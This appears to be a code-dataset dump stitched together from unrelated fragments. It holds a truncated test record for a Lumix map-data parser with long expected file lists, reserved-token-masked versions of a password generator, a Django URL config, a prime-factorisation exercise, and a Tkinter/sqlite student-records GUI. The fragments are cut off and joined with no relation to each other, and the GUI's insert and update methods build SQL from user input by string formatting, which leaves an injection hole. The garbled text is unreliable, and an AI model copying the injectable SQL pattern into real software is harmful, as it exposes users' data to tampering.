'BACK/B0000047.DFT', 'BACK/B0000048.DFT', 'BACK/B0000049.DFT',\n 'BACK/B0000054.DFT', 'NAME/N0000019.DFT', 'NAME/N0000020.DFT',\n 'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000027.DFT',\n 'NAME/N0000028.DFT', 'NAME/N0000029.DFT', 'NAME/N0000030.DFT',\n 'NAME/N0000031.DFT', 'NAME/N0000036.DFT', 'NAME/N0000037.DFT',\n 'NAME/N0000038.DFT', 'NAME/N0000039.DFT', 'NAME/N0000040.DFT',\n 'NAME/N0000045.DFT', 'NAME/N0000046.DFT', 'NAME/N0000047.DFT',\n 'NAME/N0000048.DFT', 'NAME/N0000049.DFT', 'NAME/N0000054.DFT',\n 'POI/P0000019.DFT', 'POI/P0000020.DFT', 'POI/P0000021.DFT',\n 'POI/P0000022.DFT', 'POI/P0000027.DFT', 'POI/P0000028.DFT',\n 'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT',\n 'POI/P0000036.DFT', 'POI/P0000037.DFT', 'POI/P0000038.DFT',\n 'POI/P0000039.DFT', 'POI/P0000040.DFT', 'POI/P0000045.DFT',\n 'POI/P0000046.DFT', 'POI/P0000047.DFT', 'POI/P0000048.DFT',\n 'POI/P0000049.DFT', 'POI/P0000054.DFT'], (5): ['BACK/B0000002.DFT',\n 'BACK/B0000003.DFT', 'BACK/B0000004.DFT', 
'BACK/B0000011.DFT',\n 'BACK/B0000012.DFT', 'BACK/B0000013.DFT', 'BACK/B0000020.DFT',\n 'BACK/B0000021.DFT', 'BACK/B0000022.DFT', 'BACK/B0000029.DFT',\n 'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'NAME/N0000002.DFT',\n 'NAME/N0000003.DFT', 'NAME/N0000004.DFT', 'NAME/N0000011.DFT',\n 'NAME/N0000012.DFT', 'NAME/N0000013.DFT', 'NAME/N0000020.DFT',\n 'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000029.DFT',\n 'NAME/N0000030.DFT', 'NAME/N0000031.DFT', 'POI/P0000003.DFT',\n 'POI/P0000011.DFT', 'POI/P0000012.DFT', 'POI/P0000013.DFT',\n 'POI/P0000020.DFT', 'POI/P0000021.DFT', 'POI/P0000022.DFT',\n 'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT'], (6): [\n 'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',\n 'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',\n 'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',\n 'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',\n 'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',\n 'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (7): [\n 'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',\n 'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',\n 'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',\n 'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',\n 'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',\n 'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',\n 'POI/P0000032.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',\n 'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',\n 'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT'], (8): [\n 'BACK/B0000031.DFT', 'BACK/B0000032.DFT', 'BACK/B0000033.DFT',\n 'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',\n 'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',\n 'NAME/N0000031.DFT', 'NAME/N0000032.DFT', 'NAME/N0000033.DFT',\n 'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',\n 'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',\n 'POI/P0000031.DFT', 'POI/P0000032.DFT', 'POI/P0000033.DFT',\n 'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',\n 'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (9): [\n 'BACK/B0000005.DFT', 'BACK/B0000006.DFT', 'BACK/B0000007.DFT',\n 'BACK/B0000014.DFT', 'BACK/B0000015.DFT', 'BACK/B0000016.DFT',\n 'BACK/B0000023.DFT', 'BACK/B0000024.DFT', 'BACK/B0000025.DFT',\n 'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',\n 'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',\n 'NAME/N0000005.DFT', 'NAME/N0000006.DFT', 'NAME/N0000007.DFT',\n 'NAME/N0000014.DFT', 'NAME/N0000015.DFT', 'NAME/N0000016.DFT',\n 'NAME/N0000023.DFT', 'NAME/N0000024.DFT', 'NAME/N0000025.DFT',\n 'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',\n 'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',\n 'POI/P0000014.DFT', 'POI/P0000015.DFT', 'POI/P0000023.DFT',\n 'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000032.DFT',\n 'POI/P0000033.DFT', 'POI/P0000034.DFT', 'POI/P0000041.DFT',\n 'POI/P0000042.DFT', 'POI/P0000043.DFT'], (10): ['BACK/B0000037.DFT',\n 'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',\n 'BACK/B0000044.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',\n 'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',\n 'BACK/B0000053.DFT', 'BACK/B0000054.DFT', 'NAME/N0000037.DFT',\n 'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',\n 'NAME/N0000044.DFT', 'NAME/N0000045.DFT', 'NAME/N0000046.DFT',\n 'NAME/N0000050.DFT', 
'NAME/N0000051.DFT', 'NAME/N0000052.DFT',\n 'NAME/N0000053.DFT', 'NAME/N0000054.DFT', 'POI/P0000037.DFT',\n 'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',\n 'POI/P0000044.DFT', 'POI/P0000045.DFT', 'POI/P0000046.DFT',\n 'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT',\n 'POI/P0000053.DFT', 'POI/P0000054.DFT']}}\n nose.tools.assert_equal(result, expected)\n",
"step-5": "#!/usr/bin/env python\n\n# Core Library modules\nimport os\n\n# Third party modules\nimport nose\n\n# First party modules\nimport lumixmaptool.copy as copy\n\n\n# Tests\ndef get_parser_test():\n \"\"\"Check if the evaluation model returns a parser object.\"\"\"\n copy.get_parser()\n\n\ndef parse_mapdata_test():\n current_folder = os.path.dirname(os.path.realpath(__file__))\n misc_folder = os.path.join(current_folder, \"misc\")\n maplistdata_path = os.path.join(misc_folder, \"MapList.dat\")\n result = copy.parse_mapdata(maplistdata_path)\n expected = {\n \"num1\": \"00010001\",\n \"num2\": \"00010001\",\n \"regions\": {\n 1: [\n \"BACK/B0000035.DFT\",\n \"BACK/B0000036.DFT\",\n \"BACK/B0000044.DFT\",\n \"BACK/B0000045.DFT\",\n \"BACK/B0000053.DFT\",\n \"BACK/B0000054.DFT\",\n \"NAME/N0000035.DFT\",\n \"NAME/N0000036.DFT\",\n \"NAME/N0000044.DFT\",\n \"NAME/N0000045.DFT\",\n \"NAME/N0000053.DFT\",\n \"NAME/N0000054.DFT\",\n \"POI/P0000035.DFT\",\n \"POI/P0000036.DFT\",\n \"POI/P0000044.DFT\",\n \"POI/P0000045.DFT\",\n \"POI/P0000053.DFT\",\n \"POI/P0000054.DFT\",\n ],\n 2: [\n \"BACK/B0000024.DFT\",\n \"BACK/B0000025.DFT\",\n \"BACK/B0000026.DFT\",\n \"BACK/B0000027.DFT\",\n \"BACK/B0000033.DFT\",\n \"BACK/B0000034.DFT\",\n \"BACK/B0000035.DFT\",\n \"BACK/B0000036.DFT\",\n \"BACK/B0000042.DFT\",\n \"BACK/B0000043.DFT\",\n \"BACK/B0000044.DFT\",\n \"BACK/B0000045.DFT\",\n \"NAME/N0000024.DFT\",\n \"NAME/N0000025.DFT\",\n \"NAME/N0000026.DFT\",\n \"NAME/N0000027.DFT\",\n \"NAME/N0000033.DFT\",\n \"NAME/N0000034.DFT\",\n \"NAME/N0000035.DFT\",\n \"NAME/N0000036.DFT\",\n \"NAME/N0000042.DFT\",\n \"NAME/N0000043.DFT\",\n \"NAME/N0000044.DFT\",\n \"NAME/N0000045.DFT\",\n \"POI/P0000024.DFT\",\n \"POI/P0000025.DFT\",\n \"POI/P0000026.DFT\",\n \"POI/P0000027.DFT\",\n \"POI/P0000033.DFT\",\n \"POI/P0000034.DFT\",\n \"POI/P0000035.DFT\",\n \"POI/P0000036.DFT\",\n \"POI/P0000042.DFT\",\n \"POI/P0000043.DFT\",\n \"POI/P0000044.DFT\",\n \"POI/P0000045.DFT\",\n ],\n 3: [\n \"BACK/B0000001.DFT\",\n \"BACK/B0000008.DFT\",\n \"BACK/B0000009.DFT\",\n \"BACK/B0000010.DFT\",\n \"BACK/B0000017.DFT\",\n \"BACK/B0000018.DFT\",\n \"BACK/B0000019.DFT\",\n \"BACK/B0000026.DFT\",\n \"BACK/B0000027.DFT\",\n \"NAME/N0000001.DFT\",\n \"NAME/N0000008.DFT\",\n \"NAME/N0000009.DFT\",\n \"NAME/N0000010.DFT\",\n \"NAME/N0000017.DFT\",\n \"NAME/N0000018.DFT\",\n \"NAME/N0000019.DFT\",\n \"NAME/N0000026.DFT\",\n \"NAME/N0000027.DFT\",\n \"POI/P0000017.DFT\",\n \"POI/P0000018.DFT\",\n \"POI/P0000019.DFT\",\n \"POI/P0000026.DFT\",\n \"POI/P0000027.DFT\",\n ],\n 4: [\n \"BACK/B0000019.DFT\",\n \"BACK/B0000020.DFT\",\n \"BACK/B0000021.DFT\",\n \"BACK/B0000022.DFT\",\n \"BACK/B0000027.DFT\",\n \"BACK/B0000028.DFT\",\n \"BACK/B0000029.DFT\",\n \"BACK/B0000030.DFT\",\n \"BACK/B0000031.DFT\",\n \"BACK/B0000036.DFT\",\n \"BACK/B0000037.DFT\",\n \"BACK/B0000038.DFT\",\n \"BACK/B0000039.DFT\",\n \"BACK/B0000040.DFT\",\n \"BACK/B0000045.DFT\",\n \"BACK/B0000046.DFT\",\n \"BACK/B0000047.DFT\",\n \"BACK/B0000048.DFT\",\n \"BACK/B0000049.DFT\",\n \"BACK/B0000054.DFT\",\n \"NAME/N0000019.DFT\",\n \"NAME/N0000020.DFT\",\n \"NAME/N0000021.DFT\",\n \"NAME/N0000022.DFT\",\n \"NAME/N0000027.DFT\",\n \"NAME/N0000028.DFT\",\n \"NAME/N0000029.DFT\",\n \"NAME/N0000030.DFT\",\n \"NAME/N0000031.DFT\",\n \"NAME/N0000036.DFT\",\n \"NAME/N0000037.DFT\",\n \"NAME/N0000038.DFT\",\n \"NAME/N0000039.DFT\",\n \"NAME/N0000040.DFT\",\n \"NAME/N0000045.DFT\",\n \"NAME/N0000046.DFT\",\n \"NAME/N0000047.DFT\",\n \"NAME/N0000048.DFT\",\n 
\"NAME/N0000049.DFT\",\n \"NAME/N0000054.DFT\",\n \"POI/P0000019.DFT\",\n \"POI/P0000020.DFT\",\n \"POI/P0000021.DFT\",\n \"POI/P0000022.DFT\",\n \"POI/P0000027.DFT\",\n \"POI/P0000028.DFT\",\n \"POI/P0000029.DFT\",\n \"POI/P0000030.DFT\",\n \"POI/P0000031.DFT\",\n \"POI/P0000036.DFT\",\n \"POI/P0000037.DFT\",\n \"POI/P0000038.DFT\",\n \"POI/P0000039.DFT\",\n \"POI/P0000040.DFT\",\n \"POI/P0000045.DFT\",\n \"POI/P0000046.DFT\",\n \"POI/P0000047.DFT\",\n \"POI/P0000048.DFT\",\n \"POI/P0000049.DFT\",\n \"POI/P0000054.DFT\",\n ],\n 5: [\n \"BACK/B0000002.DFT\",\n \"BACK/B0000003.DFT\",\n \"BACK/B0000004.DFT\",\n \"BACK/B0000011.DFT\",\n \"BACK/B0000012.DFT\",\n \"BACK/B0000013.DFT\",\n \"BACK/B0000020.DFT\",\n \"BACK/B0000021.DFT\",\n \"BACK/B0000022.DFT\",\n \"BACK/B0000029.DFT\",\n \"BACK/B0000030.DFT\",\n \"BACK/B0000031.DFT\",\n \"NAME/N0000002.DFT\",\n \"NAME/N0000003.DFT\",\n \"NAME/N0000004.DFT\",\n \"NAME/N0000011.DFT\",\n \"NAME/N0000012.DFT\",\n \"NAME/N0000013.DFT\",\n \"NAME/N0000020.DFT\",\n \"NAME/N0000021.DFT\",\n \"NAME/N0000022.DFT\",\n \"NAME/N0000029.DFT\",\n \"NAME/N0000030.DFT\",\n \"NAME/N0000031.DFT\",\n \"POI/P0000003.DFT\",\n \"POI/P0000011.DFT\",\n \"POI/P0000012.DFT\",\n \"POI/P0000013.DFT\",\n \"POI/P0000020.DFT\",\n \"POI/P0000021.DFT\",\n \"POI/P0000022.DFT\",\n \"POI/P0000029.DFT\",\n \"POI/P0000030.DFT\",\n \"POI/P0000031.DFT\",\n ],\n 6: [\n \"BACK/B0000040.DFT\",\n \"BACK/B0000041.DFT\",\n \"BACK/B0000042.DFT\",\n \"BACK/B0000049.DFT\",\n \"BACK/B0000050.DFT\",\n \"BACK/B0000051.DFT\",\n \"NAME/N0000040.DFT\",\n \"NAME/N0000041.DFT\",\n \"NAME/N0000042.DFT\",\n \"NAME/N0000049.DFT\",\n \"NAME/N0000050.DFT\",\n \"NAME/N0000051.DFT\",\n \"POI/P0000040.DFT\",\n \"POI/P0000041.DFT\",\n \"POI/P0000042.DFT\",\n \"POI/P0000049.DFT\",\n \"POI/P0000050.DFT\",\n \"POI/P0000051.DFT\",\n ],\n 7: [\n \"BACK/B0000032.DFT\",\n \"BACK/B0000033.DFT\",\n \"BACK/B0000034.DFT\",\n \"BACK/B0000041.DFT\",\n \"BACK/B0000042.DFT\",\n \"BACK/B0000043.DFT\",\n \"BACK/B0000050.DFT\",\n \"BACK/B0000051.DFT\",\n \"BACK/B0000052.DFT\",\n \"NAME/N0000032.DFT\",\n \"NAME/N0000033.DFT\",\n \"NAME/N0000034.DFT\",\n \"NAME/N0000041.DFT\",\n \"NAME/N0000042.DFT\",\n \"NAME/N0000043.DFT\",\n \"NAME/N0000050.DFT\",\n \"NAME/N0000051.DFT\",\n \"NAME/N0000052.DFT\",\n \"POI/P0000032.DFT\",\n \"POI/P0000033.DFT\",\n \"POI/P0000034.DFT\",\n \"POI/P0000041.DFT\",\n \"POI/P0000042.DFT\",\n \"POI/P0000043.DFT\",\n \"POI/P0000050.DFT\",\n \"POI/P0000051.DFT\",\n \"POI/P0000052.DFT\",\n ],\n 8: [\n \"BACK/B0000031.DFT\",\n \"BACK/B0000032.DFT\",\n \"BACK/B0000033.DFT\",\n \"BACK/B0000040.DFT\",\n \"BACK/B0000041.DFT\",\n \"BACK/B0000042.DFT\",\n \"BACK/B0000049.DFT\",\n \"BACK/B0000050.DFT\",\n \"BACK/B0000051.DFT\",\n \"NAME/N0000031.DFT\",\n \"NAME/N0000032.DFT\",\n \"NAME/N0000033.DFT\",\n \"NAME/N0000040.DFT\",\n \"NAME/N0000041.DFT\",\n \"NAME/N0000042.DFT\",\n \"NAME/N0000049.DFT\",\n \"NAME/N0000050.DFT\",\n \"NAME/N0000051.DFT\",\n \"POI/P0000031.DFT\",\n \"POI/P0000032.DFT\",\n \"POI/P0000033.DFT\",\n \"POI/P0000040.DFT\",\n \"POI/P0000041.DFT\",\n \"POI/P0000042.DFT\",\n \"POI/P0000049.DFT\",\n \"POI/P0000050.DFT\",\n \"POI/P0000051.DFT\",\n ],\n 9: [\n \"BACK/B0000005.DFT\",\n \"BACK/B0000006.DFT\",\n \"BACK/B0000007.DFT\",\n \"BACK/B0000014.DFT\",\n \"BACK/B0000015.DFT\",\n \"BACK/B0000016.DFT\",\n \"BACK/B0000023.DFT\",\n \"BACK/B0000024.DFT\",\n \"BACK/B0000025.DFT\",\n \"BACK/B0000032.DFT\",\n \"BACK/B0000033.DFT\",\n \"BACK/B0000034.DFT\",\n \"BACK/B0000041.DFT\",\n 
\"BACK/B0000042.DFT\",\n \"BACK/B0000043.DFT\",\n \"NAME/N0000005.DFT\",\n \"NAME/N0000006.DFT\",\n \"NAME/N0000007.DFT\",\n \"NAME/N0000014.DFT\",\n \"NAME/N0000015.DFT\",\n \"NAME/N0000016.DFT\",\n \"NAME/N0000023.DFT\",\n \"NAME/N0000024.DFT\",\n \"NAME/N0000025.DFT\",\n \"NAME/N0000032.DFT\",\n \"NAME/N0000033.DFT\",\n \"NAME/N0000034.DFT\",\n \"NAME/N0000041.DFT\",\n \"NAME/N0000042.DFT\",\n \"NAME/N0000043.DFT\",\n \"POI/P0000014.DFT\",\n \"POI/P0000015.DFT\",\n \"POI/P0000023.DFT\",\n \"POI/P0000024.DFT\",\n \"POI/P0000025.DFT\",\n \"POI/P0000032.DFT\",\n \"POI/P0000033.DFT\",\n \"POI/P0000034.DFT\",\n \"POI/P0000041.DFT\",\n \"POI/P0000042.DFT\",\n \"POI/P0000043.DFT\",\n ],\n 10: [\n \"BACK/B0000037.DFT\",\n \"BACK/B0000041.DFT\",\n \"BACK/B0000042.DFT\",\n \"BACK/B0000043.DFT\",\n \"BACK/B0000044.DFT\",\n \"BACK/B0000045.DFT\",\n \"BACK/B0000046.DFT\",\n \"BACK/B0000050.DFT\",\n \"BACK/B0000051.DFT\",\n \"BACK/B0000052.DFT\",\n \"BACK/B0000053.DFT\",\n \"BACK/B0000054.DFT\",\n \"NAME/N0000037.DFT\",\n \"NAME/N0000041.DFT\",\n \"NAME/N0000042.DFT\",\n \"NAME/N0000043.DFT\",\n \"NAME/N0000044.DFT\",\n \"NAME/N0000045.DFT\",\n \"NAME/N0000046.DFT\",\n \"NAME/N0000050.DFT\",\n \"NAME/N0000051.DFT\",\n \"NAME/N0000052.DFT\",\n \"NAME/N0000053.DFT\",\n \"NAME/N0000054.DFT\",\n \"POI/P0000037.DFT\",\n \"POI/P0000041.DFT\",\n \"POI/P0000042.DFT\",\n \"POI/P0000043.DFT\",\n \"POI/P0000044.DFT\",\n \"POI/P0000045.DFT\",\n \"POI/P0000046.DFT\",\n \"POI/P0000050.DFT\",\n \"POI/P0000051.DFT\",\n \"POI/P0000052.DFT\",\n \"POI/P0000053.DFT\",\n \"POI/P0000054.DFT\",\n ],\n },\n }\n nose.tools.assert_equal(result, expected)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while True:
password = ''.join(secrets.choice(alphabets) for i in range(10))
if any(c.islower() for c in password) and any(c.isupper() for c in password
) and sum(c.isdigit() for c in password) >= 3:
print(password)
break
<|reserved_special_token_1|>
<|reserved_special_token_0|>
alphabets = string.ascii_letters + string.digits
while True:
password = ''.join(secrets.choice(alphabets) for i in range(10))
if any(c.islower() for c in password) and any(c.isupper() for c in password
) and sum(c.isdigit() for c in password) >= 3:
print(password)
break
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import secrets
import string
alphabets = string.ascii_letters + string.digits
while True:
password = ''.join(secrets.choice(alphabets) for i in range(10))
if any(c.islower() for c in password) and any(c.isupper() for c in password
) and sum(c.isdigit() for c in password) >= 3:
print(password)
break
<|reserved_special_token_1|>
'''
Generate a ten-character alphanumeric password with at least one lowercase,
at least one uppercase character, and at least three digits
'''
import secrets
import string
alphabets = string.ascii_letters + string.digits
while True:
password = "".join(secrets.choice(alphabets) for i in range(10))
if(any(c.islower() for c in password) and
any(c.isupper() for c in password) and
sum(c.isdigit() for c in password) >= 3):
print(password)
break
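

# Variant sketch (assuming the same policy as above: length 10, at least one
# lowercase, at least one uppercase, at least three digits). Instead of
# re-drawing until a sample passes, build the required characters directly
# and shuffle them, so no retries are needed:
import secrets
import string

def make_password(length=10, min_digits=3):
    chars = [secrets.choice(string.ascii_lowercase),
             secrets.choice(string.ascii_uppercase)]
    chars += [secrets.choice(string.digits) for _ in range(min_digits)]
    alphabet = string.ascii_letters + string.digits
    chars += [secrets.choice(alphabet) for _ in range(length - len(chars))]
    secrets.SystemRandom().shuffle(chars)  # hide the positions of the forced picks
    return ''.join(chars)

print(make_password())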
|
flexible
|
{
"blob_id": "0c283cd31203291da24226a0eae781bd397e84d4",
"index": 9526,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n password = ''.join(secrets.choice(alphabets) for i in range(10))\n if any(c.islower() for c in password) and any(c.isupper() for c in password\n ) and sum(c.isdigit() for c in password) >= 3:\n print(password)\n break\n",
"step-3": "<mask token>\nalphabets = string.ascii_letters + string.digits\nwhile True:\n password = ''.join(secrets.choice(alphabets) for i in range(10))\n if any(c.islower() for c in password) and any(c.isupper() for c in password\n ) and sum(c.isdigit() for c in password) >= 3:\n print(password)\n break\n",
"step-4": "<mask token>\nimport secrets\nimport string\nalphabets = string.ascii_letters + string.digits\nwhile True:\n password = ''.join(secrets.choice(alphabets) for i in range(10))\n if any(c.islower() for c in password) and any(c.isupper() for c in password\n ) and sum(c.isdigit() for c in password) >= 3:\n print(password)\n break\n",
"step-5": "'''\r\nGenerate a ten-character alphanumeric password with at least one lowercase,\r\nat least one uppercase character, and at least three digits\r\n'''\r\nimport secrets\r\nimport string\r\nalphabets = string.ascii_letters + string.digits\r\nwhile True:\r\n password = \"\".join(secrets.choice(alphabets) for i in range(10))\r\n if(any(c.islower() for c in password) and\r\n any(c.isupper() for c in password) and\r\n sum(c.isdigit() for c in password) >= 3):\r\n print(password)\r\n break\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
urlpatterns = [path('admin/', admin.site.urls), path('', include(
'blog.urls', namespace='blog')), url('^hello/([0-9]{4})/$', view.hello),
url('^ifor/', view.ifor)]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from django.contrib import admin
from django.urls import path, include
from django.conf.urls import url
from . import view
urlpatterns = [path('admin/', admin.site.urls), path('', include(
'blog.urls', namespace='blog')), url('^hello/([0-9]{4})/$', view.hello),
url('^ifor/', view.ifor)]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
"""helloworld URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
https://docs.djangoproject.com/zh-hans/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
# example:

# python3.0
from django.contrib import admin

# why is path used here?
from django.urls import path, include

from django.conf.urls import url

from . import view

# how do we hook in URL patterns defined under another app's module?
urlpatterns = [
    # path('hello/', view.hello),
    # path('hello/<int:year>/', view.hello),  # hello() must accept the matching argument
    # path('ifor/', view.ifor),
    path('admin/', admin.site.urls),
    # path('blog/', blog.views.goodbye),
    # path('', include('blog.urls.py', namespace='blog')),  # wrong: include() takes a module path, not a filename
    path('', include('blog.urls', namespace='blog')),
    # url(r'^hello/$', view.hello),
    url(r'^hello/([0-9]{4})/$', view.hello),
    url(r'^ifor/', view.ifor),
    # url(r'^blog/', 'blog.views.goodbye')
]
"""
# python 2.7
from django.conf.urls import url
from . import view
urlpatterns = [
url(r'^$', view.hello),
]
"""
# Problem 014: factor a positive integer into its prime factors
# Approach: mimic factoring by hand; once a factor is found, divide it out so the number shrinks
'''
Finding the prime factors is not hard; printing them out neatly is the slightly fiddly part
'''
num = int(input('Enter an integer: '))
original = num
a = []
while num > 1:
for i in range(2,num+1):
if num%i == 0:
a.append(i)
num = num//i
break
print("%d ="%(original),end='')
for i in range(len(a)-1):
print(a[i],end='*')
print(a[len(a)-1])
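
# A small, hypothetical helper wrapping the same loop so the logic can be
# tested without input() (an illustrative addition, not part of the exercise):
def prime_factors(n):
    factors = []
    while n > 1:
        for i in range(2, n + 1):
            if n % i == 0:  # the smallest divisor found is always prime
                factors.append(i)
                n //= i
                break
    return factors

assert prime_factors(84) == [2, 2, 3, 7]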
from tkinter import *
from tkinter import filedialog
import sqlite3
class Gui:
def __init__(self):
global en3
self.scr = Tk()
self.scr.geometry("2000x3000")
self.scr.title("VIEWING DATABASE")
self.connection = sqlite3.connect("student_details.db")
self.cursor = self.connection.cursor()
self.id = StringVar()
self.name1 = StringVar()
self.fathername = StringVar()
self.mothername = StringVar()
self.cont = StringVar()
self.email = StringVar()
self.f1 = Frame(self.scr, bg='brown1')
self.f1.pack(side=TOP)
self.left_frame = Frame(self.scr, bg='red')
self.left_frame.pack(side=LEFT, fill=Y)
self.right_frame = Frame(self.scr, width=3000, bg='yellow')
self.right_frame.pack(side=LEFT, fill=Y)
l = Label(self.right_frame, text="***************SHOW TABLE RECORDS IN A DATABASE******************",
font=('times', 25, 'bold'), bg="black", fg="white")
l.pack(side=TOP, fill=X)
scrollbar = Scrollbar(self.right_frame)
scrollbar.pack(side=RIGHT, fill=Y)
self.list = Listbox(self.right_frame, width=61, height=12, font=('times', 25, 'bold'),
yscrollcommand=scrollbar.set)
        self.list.bind("<<ListboxSelect>>", self.show_records)  # "student_list" is not a Tk event sequence; bind the listbox selection event
self.list.pack(side=TOP, fill=Y)
scrollbar.config(command=self.list.yview)
        self.query_frame = Frame(self.right_frame, width=81, height=5, bg="white")
        self.query_frame.pack(side=BOTTOM, fill=X)
        self.en3 = Entry(self.query_frame, font=('times', 25, 'bold'))
        self.en3.pack(side=BOTTOM, fill=X)
        b = Button(self.query_frame, text="Enter", command=self.sample, font=('times', 25, 'bold'), bg="white", fg="black")
        b.pack(side=RIGHT)
        b1 = Button(self.query_frame, text="Save", command=self.show_data, font=('times', 25, 'bold'), bg="white",
                    fg="black")
        b1.pack(side=RIGHT)
b = Button(self.f1, text="OPEN", command=self.file, font=('times', 25, 'bold'), bg="white", fg="black")
b.pack(side=LEFT)
b = Button(self.f1, text="CREATE", command=self.create_table, font=('times', 25, 'bold'), bg="white",
fg="black")
b.pack(side=LEFT)
b1 = Button(self.f1, text="INSERT", command=self.add_record, font=('times', 25, 'bold'), bg="white",
fg="black")
b1.pack(side=LEFT)
b2 = Button(self.f1, text="DELETE", command=self.del_rec, font=('times', 25, 'bold'), bg="white",
fg="black")
b2.pack(side=LEFT)
b3 = Button(self.f1, text="UPDATE", command=self.update, font=('times', 25, 'bold'), bg="white",
fg="black")
b3.pack(side=RIGHT)
b4 = Button(self.f1, text="VIEW", command=lambda: self.view_table(), font=('times', 25, 'bold'), bg="white",
fg="black")
b4.pack(side=RIGHT)
b4 = Button(self.f1, text="BROWSE", command=self.show_data, font=('times', 25, 'bold'), bg="white",
fg="black")
b4.pack(side=RIGHT)
l = Label(self.left_frame, text="View Table in Database", font=('times', 25, 'bold'), bg='blue', fg='white')
l.pack(side=TOP, fill=X)
        # create the table before entering the event loop; in the original
        # order this code only ran after the window was closed
        try:
            self.cursor.execute("create table user(Id varchar(10),Name varchar(30),FathersName varchar(20),MothersName varchar(20),Contact varchar(10),Email varchar(30))")
            self.connection.commit()
        except:
            pass
        self.scr.mainloop()
    def insert_data(self):
        self.id = e.get()
        self.name1 = e1.get()
        self.fathername = e2.get()
        self.mothername = e3.get()
        self.cont = e4.get()
        self.email = e5.get()
        # use placeholders instead of string formatting to avoid SQL injection
        self.cursor.execute("insert into user values(?,?,?,?,?,?)",
                            (self.id, self.name1, self.fathername, self.mothername, self.cont, self.email))
        self.connection.commit()
def show_data(self):
self.connection = sqlite3.connect("student_details.db")
self.cursor = self.connection.cursor()
self.cursor.execute("Select * from user")
rows = self.cursor.fetchall()
for row in rows:
l1 = self.list.insert(END, row)
self.connection.commit()
    def update_data(self):
        # the column name cannot be a placeholder, so it is still formatted in;
        # the new value and the id are passed as parameters
        self.cursor.execute("Update user set {} = ? where id = ?".format(e2.get()), (e3.get(), e.get()))
        self.connection.commit()
        self.list.delete(0, END)
        self.show_data()
def update(self):
global e
global e2
global e3
self.top1 = Toplevel(self.scr)
self.top1.geometry("400x400")
l1 = Label(self.top1, text="USER_ID", font=('times', 25, 'bold'), bg="green2", fg="white")
l1.pack()
self.Id=StringVar()
e = Entry(self.top1, relief="sunken", textvariable=self.Id, font=('times', 25, 'bold'))
e.pack()
self.col_name=StringVar()
l2 = Label(self.top1, text="col_name", font=('times', 25, 'bold'), bg="green2", fg="white")
l2.pack()
e2 = Entry(self.top1, relief="sunken", textvariable=self.col_name, font=('times', 25, 'bold'))
e2.pack()
self.value=StringVar()
l3 = Label(self.top1, text="VALUE", font=('times', 25, 'bold'), bg="green2", fg="white")
l3.pack()
e3 = Entry(self.top1, relief="sunken", textvariable=self.value, font=('times', 25, 'bold'))
e3.pack()
b = Button(self.top1, text="UPDATE", command=self.update_data, font=('times', 25, 'bold'), bg="white",
fg="black")
b.pack()
